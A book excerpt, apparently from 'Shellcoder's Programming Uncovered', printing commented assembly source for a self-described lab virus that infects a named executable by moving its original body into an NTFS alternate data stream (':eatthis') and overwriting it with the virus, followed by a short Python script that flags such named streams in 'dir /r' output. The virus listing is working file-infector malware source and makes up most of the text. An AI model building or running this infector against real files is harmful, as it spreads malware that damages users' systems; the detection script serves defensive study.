Source Code of a Lab Virus

Natural language is poorly suited to describing computer algorithms: it is too ambiguous and too full of contradictions.

Provided in Listing 22.1 is the source code of the key fragment of the virus with comments. Technical details are omitted here. They are supplied on the companion CD-ROM of this book in the file named xcode.asm.

Listing 22.1: Source code of the key fragment of the lab virus
section '.code' code readable executable
start:
        ; Delete the temporary file.
        PUSH shutdown
        CALL [DeleteFile]

        ; Determine the name.
        PUSH 1000
        PUSH buf
        PUSH 0
        CALL [GetModuleFileName]

        ; Read the command line.
        ; The --* file name option - infect
        CALL [GetCommandLine]
        MOV  EBP, EAX
        XOR  EBX, EBX
        MOV  ECX, 202A2D2Dh        ; the bytes "--* " as a little-endian DWORD
rool:
        CMP  [EAX], ECX            ; Is this "--*"?
        JZ   infect
        INC  EAX
        CMP  [EAX], EBX            ; End of the command line?
        JNZ  rool

        ; Output the diagnostic message
        ; confirming the virus's presence in the file.
        PUSH 0
        PUSH aInfected
        PUSH aHello
        PUSH 0
        CALL [MessageBox]

        ; Add the name of the NTFS stream to the file name.
        MOV  ESI, code_name
        MOV  EDI, buf
        MOV  ECX, 100              ; code_name_end - code_name
        XOR  EAX, EAX
        REPNE SCASB                ; find the terminating zero of buf
        DEC  EDI
        REP  MOVSB                 ; append ":eatthis" in place of it

        ; Start the NTFS stream for execution.
        PUSH xxx                   ; lpProcessInformation
        PUSH xxx                   ; lpStartupInfo
        PUSH EAX                   ; the remaining six parameters are 0 (EAX = 0)
        PUSH EAX
        PUSH EAX
        PUSH EAX
        PUSH EAX
        PUSH EAX
        PUSH EBP                   ; lpCommandLine
        PUSH buf                   ; lpApplicationName = "<own name>:eatthis"
        CALL [CreateProcess]
        JMP  go2exit               ; Exit the virus.

infect:
        ; Set EAX to the first character of the target file
        ; (from now on, called the destination, or dst for short).
        ADD  EAX, 4
        XCHG EAX, EBP
        XOR  EAX, EAX
        INC  EAX

        ; Check the dst for infection.
        ; Rename dst as shutdown.
        PUSH shutdown
        PUSH EBP
        CALL [RenameFile]

        ; Copy the main stream of dst into shutdown.
        PUSH EAX
        PUSH EBP
        PUSH buf
        CALL [CopyFile]

        ; Add the NTFS stream name to the new name.
        MOV  ESI, EBP
        MOV  EDI, buf
copy_rool:
        LODSB
        STOSB
        TEST AL, AL
        JNZ  copy_rool
        MOV  ESI, code_name
        DEC  EDI
copy_rool2:
        LODSB
        STOSB
        TEST AL, AL
        JNZ  copy_rool2

        ; Copy shutdown into dst:eatthis.
        PUSH EAX
        PUSH buf
        PUSH shutdown
        CALL [CopyFile]

        ; Length of correction of the file to be infected
        ; Delete shutdown.
        PUSH shutdown
        CALL [DeleteFile]

        ; Output the diagnostic message
        ; confirming successful infection.
        PUSH 0
        PUSH aInfected
        PUSH EBP
        PUSH 0
        CALL [MessageBox]

        ; Exit the virus.
go2exit:
        PUSH 0
        CALL [ExitProcess]

section '.data' data readable writeable
        shutdown   DB "shutdown", 0   ; Name of the temporary file
        code_name  DB ":eatthis", 0   ; Name of the stream, in which
        code_name_end:                ; the main body will be stored

        ; Various text strings displayed by the virus
        aInfected DB "infected", 0
        aHello    DB "Hello, you are hacked!", 0

        ; Various buffers for auxiliary purposes
        buf RB 1000
        xxx RB 1000
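The listing hides the host's original body in a named NTFS stream (":eatthis"), so one quick triage step for a suspect directory is to list streams with `dir /r` and surface every named $DATA stream attached to an executable. The Python below is an added example, not code from the book: it parses a constructed `dir /r` sample (file names and sizes are made up) and flags streams outside a small allowlist of streams Windows writes itself.

```python
import re
from typing import List, Tuple

# Constructed sample of `dir /r` output (not a real capture). The lab virus
# leaves the host's original body in a stream named ":eatthis", so a named
# $DATA stream hanging off an executable is what we want to surface.
SAMPLE_DIR_R = """\
 Directory of C:\\lab

05/14/2023  10:03 AM            73,728 victim.exe
                                 4,096 victim.exe:eatthis:$DATA
05/14/2023  10:01 AM            12,288 clean.exe
05/14/2023  10:04 AM               420 notes.txt
                                    26 notes.txt:Zone.Identifier:$DATA
               3 File(s)         90,532 bytes
"""

# A stream line has no date column: only a size and "file:stream:$DATA".
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\]+):\$DATA\s*$")

# Streams Windows itself writes (download marker) that are not worth flagging.
BENIGN_STREAMS = {"Zone.Identifier"}


def parse_streams(dir_r_output: str) -> List[Tuple[str, str, int]]:
    """Return (file, stream, size) for every named $DATA stream in dir /r output."""
    found = []
    for line in dir_r_output.splitlines():
        m = STREAM_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append((m.group(2), m.group(3), size))
    return found


def flag_streams(dir_r_output: str, benign=BENIGN_STREAMS) -> List[Tuple[str, str, int]]:
    """Drop allowlisted streams; list hits on executables first."""
    hits = [s for s in parse_streams(dir_r_output) if s[1] not in benign]
    return sorted(hits, key=lambda s: not s[0].lower().endswith(".exe"))


if __name__ == "__main__":
    for file, stream, size in flag_streams(SAMPLE_DIR_R):
        print(f"{file}: named stream '{stream}' ({size} bytes)")
```

On a live system, feed the function the saved output of `dir /r` (or the equivalent `Get-Item -Stream *` listing) rather than the constructed sample.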
Shellcoder's Programming Uncovered (Uncovered series)
ISBN: 193176946X
Year: 2003
Pages: 164